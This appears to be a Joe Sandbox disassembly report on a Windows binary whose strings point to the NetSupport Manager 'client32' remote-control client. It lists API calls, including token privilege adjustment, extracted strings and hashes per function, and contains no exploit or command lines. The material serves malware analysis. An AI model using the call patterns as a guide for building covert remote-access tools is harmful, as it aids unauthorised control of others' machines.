                                                                                      Similarity
                                                                                      • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                      • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                      • API String ID: 716802716-1571441106
                                                                                      • Opcode ID: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                      • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                      • Opcode Fuzzy Hash: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                      • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

                                                                                      Control-flow Graph (rendered graph omitted; the calls it contains are listed under APIs below)
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                      • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                      • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                      • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                      • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                      • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                      • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                      • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                      • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                      • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                      • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                      • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                      • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                      • API String ID: 3874234733-2061581830
                                                                                      • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                      • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                      • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                      • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

                                                                                      Control-flow Graph (rendered graph omitted; the calls it contains are listed under APIs below)
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                      • IsWindow.USER32(0002046E), ref: 11139125
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 11139133
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 1113916B
                                                                                      • GetForegroundWindow.USER32 ref: 11139186
                                                                                      • EnableWindow.USER32(0002046E,00000000), ref: 111391A0
                                                                                      • EnableWindow.USER32(0002046E,00000001), ref: 111391BC
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                      • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                      • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 11139248
                                                                                      • IsIconic.USER32(0002046E), ref: 11139255
                                                                                      • GetForegroundWindow.USER32 ref: 1113925F
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(0002046E,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(0002046E,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                      • EnableWindow.USER32(0002046E,00000001), ref: 11139294
                                                                                      • GetLastError.KERNEL32 ref: 11139353
                                                                                      • GetLastError.KERNEL32 ref: 111393CB
                                                                                      • GetTickCount.KERNEL32 ref: 11139678
                                                                                      • GetTickCount.KERNEL32 ref: 11139699
                                                                                        • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                      • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                      • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin$
                                                                                      • API String ID: 2511061093-1914206996
                                                                                      • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                      • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                      • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                      • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                      • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                      • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                      • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                      • String ID: SHELL32.DLL$SHGetSettings
                                                                                      • API String ID: 4195908086-2348320231
                                                                                      • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                      • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                      • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                      • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Similarity
• API ID: _memset
• String ID: NBCTL32.DLL$_License$serial_no
• API String ID: 2102423945-35127696
APIs
• SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
Strings
Similarity
• API ID: ExceptionFilterUnhandled
• String ID: Client32$NSMWClass$NSMWClass
• API String ID: 3192549508-611217420
APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,111EEB64,?,00000001,00000001), ref: 1109E990
• EqualSid.ADVAPI32(?,00F5DEA0,?,00000001,00000001), ref: 1109E9A3
Similarity
• API ID: InformationToken$AllocateEqualInitialize
• String ID:
• API String ID: 1878589025-0
APIs
• GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,4012B9B4,00080000,00000000,00000000), ref: 1109D46D
• OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
• LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
• AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
Similarity
• API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 2349140579-0
APIs
• AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
• CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                        • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                      • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                      • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                        • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                      • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                      • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                      • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                      • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                      • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                        • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                        • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• DispatchMessageA.USER32(?), ref: 1102FA96
• PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
• CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
• GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
• SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
• SetWindowPos.USER32(0002046E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
• CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
• wsprintfA.USER32 ref: 1102FFA5
• PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
• PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
• PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
• PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
  • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,4012B9B4,00000002,74DF2EE0), ref: 1112820A
  • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
  • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Similarity
• API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
• String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$405464$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui$

Control-flow Graph (function 1102db00; the rendered graph is not reproduced here)
Similarity
• API ID: _malloc_memsetwsprintf
• String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$405464$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s

Control-flow Graph (function 110a9c90; the rendered graph is not reproduced here)
APIs
• LoadLibraryA.KERNEL32(setupapi.dll,4012B9B4,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
• GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
• SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
• GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
• _free.LIBCMT ref: 110A9D60
• GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
• GetLastError.KERNEL32 ref: 110A9D9D
• _malloc.LIBCMT ref: 110A9DB3
• GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
• SetLastError.KERNEL32(00000078), ref: 110A9E1B
• GetLastError.KERNEL32 ref: 110A9E21
• _free.LIBCMT ref: 110A9E33
• SetLastError.KERNEL32(00000078), ref: 110A9E44
• SetLastError.KERNEL32(00000078), ref: 110A9E51
• _free.LIBCMT ref: 110A9E64
• FreeLibrary.KERNEL32(?,?), ref: 110A9E74
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
Similarity
• API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
• String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll

Control-flow Graph (function 11133920; the rendered graph is not reproduced here)
APIs
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,4012B9B4), ref: 1113398E
• LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
• GetCurrentProcess.KERNEL32 ref: 11133A27
• GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
• GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
• SetLastError.KERNEL32(00000078), ref: 11133A68
• GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
• GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
• SetLastError.KERNEL32(00000078), ref: 11133AC9
• SetLastError.KERNEL32(00000078), ref: 11133AD6
• GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
• K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
• SetLastError.KERNEL32(00000078), ref: 11133B01
• FreeLibrary.KERNEL32(?), ref: 11133C6B
• FreeLibrary.KERNEL32(?), ref: 11133C78
• FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
